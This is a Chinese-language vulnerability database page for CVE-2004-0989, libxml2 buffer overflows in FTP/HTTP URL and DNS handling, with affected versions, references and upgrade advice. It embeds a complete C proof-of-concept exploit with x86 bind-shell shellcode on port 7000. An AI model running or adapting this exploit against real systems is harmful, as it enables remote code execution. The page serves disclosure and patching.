CVE-2004-0989
CVSS10.0
发布时间 :2005-03-01 00:00:00
修订时间 :2016-10-17 22:50:29
NMCOES    

[原文]Multiple buffer overflows in libXML 2.6.12 and 2.6.13 (libxml2), and possibly other versions, may allow remote attackers to execute arbitrary code via (1) a long FTP URL that is not properly handled by the xmlNanoFTPScanURL function, (2) a long proxy URL containing FTP data that is not properly handled by the xmlNanoFTPScanProxy function, and other overflows related to manipulation of DNS length values, including (3) xmlNanoFTPConnect, (4) xmlNanoHTTPConnectHost, and (5) xmlNanoHTTPConnectHost.


[CNNVD]libxml2 缓冲区溢出漏洞(CNNVD-200503-029)

        Libxml2是Gnome项目组开发的XML C解析器和工具集。
        Libxml2在处理部分类型UR时存在问题,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        问题一是当解析FTP性质的URL时存在缓冲区溢出,从用户提供的数据没有任何长度检查就直接拷贝到静态缓冲区,可触发漏洞。
        问题二是解析代理URL数据时存在缓冲区溢出,从用户提供的数据没有任何长度检查就直接拷贝到静态缓冲区,可触发漏洞。
        问题三是代码在处理通过DNS解析名字时存在多个缓冲区溢出,攻击者运行恶意DNS服务器,或者攻击者在LAN中伪造DNS应答,可能以进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:xmlsoft:libxml2:2.6.13XMLSoft Libxml2 2.6.13
cpe:/a:xmlsoft:libxml2:2.6.9XMLSoft Libxml2 2.6.9
cpe:/a:xmlsoft:libxml2:2.6.8XMLSoft Libxml2 2.6.8
cpe:/a:xmlsoft:libxml2:2.5.11XMLSoft Libxml2 2.5.11
cpe:/a:xmlsoft:libxml2:2.6.12XMLSoft Libxml2 2.6.12
cpe:/o:redhat:fedora_core:core_2.0
cpe:/a:xmlsoft:libxml2:2.6.14XMLSoft Libxml2 2.6.14
cpe:/a:xmlsoft:libxml2:2.6.11XMLSoft Libxml2 2.6.11
cpe:/a:xmlsoft:libxml2:2.6.7XMLSoft Libxml2 2.6.7
cpe:/a:xmlsoft:libxml2:2.6.6XMLSoft Libxml2 2.6.6
cpe:/o:trustix:secure_linux:2.1Trustix Secure Linux 2.1
cpe:/o:ubuntu:ubuntu_linux:4.1::ppc
cpe:/o:trustix:secure_linux:2.0Trustix Secure Linux 2.0
cpe:/a:xmlstarlet:command_line_xml_toolkit:0.9.1
cpe:/o:ubuntu:ubuntu_linux:4.1::ia64
cpe:/a:xmlsoft:libxml:1.8.17

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:1173Multiple Buffer Overflows in libXML2
oval:org.mitre.oval:def:10505Multiple buffer overflows in libXML 2.6.12 and 2.6.13 (libxml2), and possibly other versions, may allow remote attackers to execute arbitrar...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0989
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0989
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200503-029
(官方数据源) CNNVD

- 其它链接及资源

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000890
(UNKNOWN)  CONECTIVA  CLA-2004:890
http://lists.apple.com/archives/security-announce/2005/Jan/msg00001.html
(UNKNOWN)  APPLE  APPLE-SA-2005-01-25
http://marc.info/?l=bugtraq&m=109880813013482&w=2
(UNKNOWN)  BUGTRAQ  20041026 libxml2 remote buffer overflows (not in xml parsing code though)
http://marc.info/?l=bugtraq&m=110972110516151&w=2
(UNKNOWN)  UBUNTU  USN-89-1
http://securitytracker.com/id?1011941
(UNKNOWN)  SECTRACK  1011941
http://www.ciac.org/ciac/bulletins/p-029.shtml
(UNKNOWN)  CIAC  P-029
http://www.debian.org/security/2004/dsa-582
(UNKNOWN)  DEBIAN  DSA-582
http://www.gentoo.org/security/en/glsa/glsa-200411-05.xml
(UNKNOWN)  GENTOO  GLSA-200411-05
http://www.novell.com/linux/security/advisories/2005_01_sr.html
(UNKNOWN)  SUSE  SUSE-SR:2005:001
http://www.redhat.com/support/errata/RHSA-2004-615.html
(UNKNOWN)  REDHAT  RHSA-2004:615
http://www.redhat.com/support/errata/RHSA-2004-650.html
(UNKNOWN)  REDHAT  RHSA-2004:650
http://www.securityfocus.com/bid/11526
(VENDOR_ADVISORY)  BID  11526
http://xforce.iss.net/xforce/xfdb/17870
(VENDOR_ADVISORY)  XF  libxml2-xmlnanoftpscanurl-bo(17870)
http://xforce.iss.net/xforce/xfdb/17872
(UNKNOWN)  XF  libxml2-nanoftp-file-bo(17872)
http://xforce.iss.net/xforce/xfdb/17875
(VENDOR_ADVISORY)  XF  libxml2-xmlnanoftpscanproxy-bo(17875)
http://xforce.iss.net/xforce/xfdb/17876
(UNKNOWN)  XF  libxml2-nanohttp-file-bo(17876)

- 漏洞信息

libxml2 缓冲区溢出漏洞
危急 缓冲区溢出
2005-03-01 00:00:00 2005-10-20 00:00:00
远程  
        Libxml2是Gnome项目组开发的XML C解析器和工具集。
        Libxml2在处理部分类型UR时存在问题,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        问题一是当解析FTP性质的URL时存在缓冲区溢出,从用户提供的数据没有任何长度检查就直接拷贝到静态缓冲区,可触发漏洞。
        问题二是解析代理URL数据时存在缓冲区溢出,从用户提供的数据没有任何长度检查就直接拷贝到静态缓冲区,可触发漏洞。
        问题三是代码在处理通过DNS解析名字时存在多个缓冲区溢出,攻击者运行恶意DNS服务器,或者攻击者在LAN中伪造DNS应答,可能以进程权限在系统上执行任意指令。
        

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://www.xmlsoft.org/

- 漏洞信息 (24704)

Libxml2 Multiple Remote Stack Buffer Overflow Vulnerabilities (EDBID:24704)
linux remote
2004-10-26 Verified
0 Sean
N/A [点击下载]
source: http://www.securityfocus.com/bid/11526/info

The 'libxml2' library is reported prone to multiple remote stack-based buffer-overflow vulnerabilities caused by insufficient boundary checks. Remote attackers may exploit these issues to execute arbitrary code on a vulnerable computer. 

The URI parsing functionality and the DNS name resolving code are affected. 

These issues affect libxml2 2.6.12 through 2.6.14. Other versions may also be affected.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

/*
 *  libxml 2.6.12 nanoftp bof POC   infamous42mdAThotpopDOTcom
 *
 *  [n00b@localho.outernet] gcc -Wall libsuxml.c -lxml2
 *  [n00b@localho.outernet] ./a.out
 *  Usage: ./a.out <retaddr> [ align ]
 *  [n00b@localho.outernet] netstat -ant | grep 7000
 *  [n00b@localho.outernet] ./a.out 0xbfff0360
 *  xmlNanoFTPScanURL: Use [IPv6]/IPv4 format
 *  [n00b@localho.outernet] netstat -ant | grep 7000
 *  tcp        0      0 0.0.0.0:7000            0.0.0.0:*               LISTEN
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <libxml/nanoftp.h>

#define die(x) do{ perror((x)); exit(1); }while(0)
#define BS 0x10000
#define NOP 0x90
#define NNOPS 3000
#define ALIGN 0

/* call them */
#define SHELL_LEN (sizeof(sc)-1)
char sc[] =
    "\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
    "\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
    "\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
    "\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
    "\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
    "\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
    "\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
    "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";


/*
 */
int main(int argc, char **argv)
{
    int x = 0, len = 0;
    char    buf[BS] = {'A',};
    long    retaddr = 0, align = ALIGN;

    if(argc < 2){
        fprintf(stderr, "Usage: %s <retaddr> [ align ]\n", argv[0]);
        return EXIT_FAILURE;
    }
    if(sscanf(argv[1], "%lx", &retaddr) != 1)
        die("sscanf");
    if(argc > 2)
        align = atoi(argv[2]);
    if(align < 0 || align > 3)
        die("nice try newblar");

    strncpy(buf, "://[", 4);
    len += 4;
    memset(buf+len, NOP, NNOPS);
    len += NNOPS;
    memcpy(buf+len, sc, SHELL_LEN);
    len += SHELL_LEN;

    len += align;
    for(x = 0; x < 2000 - (sizeof(retaddr) - 1); x += sizeof(retaddr))
        memcpy(buf+len+x, &retaddr, sizeof(retaddr));
    buf[len+x] = ']';
    buf[len+x+1] = 0;

    xmlNanoFTPNewCtxt(buf);

    return EXIT_SUCCESS;
}
		

- 漏洞信息

11179
Libxml2 FTP URL Processing Overflow
Remote / Network Access Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public Vendor Verified

- 漏洞描述

A remote overflow exists in Libxml2. libxml2's nanoftp.c xmlNanoFTPScanURL() function fails to perform boundary checking of user-supplied data that is copied into a finite stack buffer, which could potentially cause a stack-based overflow. Using a specially crafted URL, an attacker can cause a denial of service or execute arbitrary code resulting in a loss of integrity or availability.

- 时间线

2004-10-26 Unknow
2004-10-25 Unknow

- 解决方案

Upgrade to version 2.6.15 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Libxml2 Multiple Remote Stack Buffer Overflow Vulnerabilities
Boundary Condition Error 11526
Yes No
2004-10-26 12:00:00 2009-08-21 03:55:00
Discovery is credited to Sean <infamous41md@hotpop.com>.

- 受影响的程序版本

XMLStarlet Command Line XML Toolkit 0.9.1
+ S.u.S.E. Linux Personal 9.2
XMLSoft Libxml2 2.6.14
+ OpenPKG OpenPKG Current
XMLSoft Libxml2 2.6.13
XMLSoft Libxml2 2.6.12
XMLSoft Libxml2 2.6.11
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
XMLSoft Libxml2 2.6.9
+ Conectiva Linux 10.0
+ Conectiva Linux 9.0
XMLSoft Libxml2 2.6.8
+ Red Hat Fedora Core2
XMLSoft Libxml2 2.6.7
XMLSoft Libxml2 2.6.6
XMLSoft Libxml2 2.5.11
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
XMLSoft Libxml 1.8.17
+ Conectiva Linux 10.0
+ Conectiva Linux 9.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
Ubuntu Ubuntu Linux 4.1 ppc
Ubuntu Ubuntu Linux 4.1 ia64
Ubuntu Ubuntu Linux 4.1 ia32
Turbolinux Turbolinux Workstation 8.0
Turbolinux Turbolinux Workstation 7.0
Turbolinux Turbolinux Server 10.0
Turbolinux Turbolinux Server 9.0
Turbolinux Turbolinux Server 8.0
Turbolinux Turbolinux Server 7.0
Turbolinux Turbolinux Desktop 10.0
Turbolinux Turbolinux 7.0
Turbolinux Appliance Server Workgroup Edition 1.0
Turbolinux Appliance Server Hosting Edition 1.0
Turbolinux Appliance Server 1.0 Workgroup Edition
Turbolinux Appliance Server 1.0 Hosting Edition
Trustix Secure Linux 2.1
Trustix Secure Linux 2.0
Trustix Secure Enterprise Linux 2.0
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
SuSE SUSE Linux Enterprise Server 7
+ Linux kernel 2.4.19
SGI ProPack 3.0
SGI Advanced Linux Environment 3.0
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0 i386
S.u.S.E. Linux 8.0
RedHat Enterprise Linux WS 3
RedHat Enterprise Linux WS 2.1 IA64
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 3
RedHat Enterprise Linux ES 2.1 IA64
RedHat Enterprise Linux ES 2.1
RedHat Desktop 3.0
RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Fedora Core2
Red Hat Fedora 11
Red Hat Fedora 10
Red Hat Enterprise Linux AS 3
Red Hat Enterprise Linux AS 2.1 IA64
Red Hat Enterprise Linux AS 2.1
Apple Mac OS X Server 10.3.7
Apple Mac OS X Server 10.3.6
Apple Mac OS X Server 10.3.5
Apple Mac OS X Server 10.3.4
Apple Mac OS X Server 10.3.3
Apple Mac OS X Server 10.3.2
Apple Mac OS X Server 10.3.1
Apple Mac OS X Server 10.3
Apple Mac OS X 10.3.7
Apple Mac OS X 10.3.6
Apple Mac OS X 10.3.5
Apple Mac OS X 10.3.4
Apple Mac OS X 10.3.3
Apple Mac OS X 10.3.2
Apple Mac OS X 10.3.1
Apple Mac OS X 10.3
XMLSoft Libxml2 2.6.15
Apple Mac OS X Server 10.3.8
Apple Mac OS X 10.3.8

- 不受影响的程序版本

XMLSoft Libxml2 2.6.15
Apple Mac OS X Server 10.3.8
Apple Mac OS X 10.3.8

- 漏洞讨论

The 'libxml2' library is reported prone to multiple remote stack-based buffer-overflow vulnerabilities caused by insufficient boundary checks. Remote attackers may exploit these issues to execute arbitrary code on a vulnerable computer.

The URI parsing functionality and the DNS name resolving code are affected.

These issues affect libxml2 2.6.12 through 2.6.14. Other versions may also be affected.

- 漏洞利用

The following exploit code is provided:

- 解决方案

Fixes are available. Please see the references for details.


XMLSoft Libxml 1.8.17

Apple Mac OS X Server 10.3.7

Apple Mac OS X 10.3.7

XMLSoft Libxml2 2.5.11

XMLSoft Libxml2 2.6.11

XMLSoft Libxml2 2.6.12

XMLSoft Libxml2 2.6.13

XMLSoft Libxml2 2.6.14

XMLSoft Libxml2 2.6.6

XMLSoft Libxml2 2.6.7

XMLSoft Libxml2 2.6.8

XMLSoft Libxml2 2.6.9

SGI ProPack 3.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站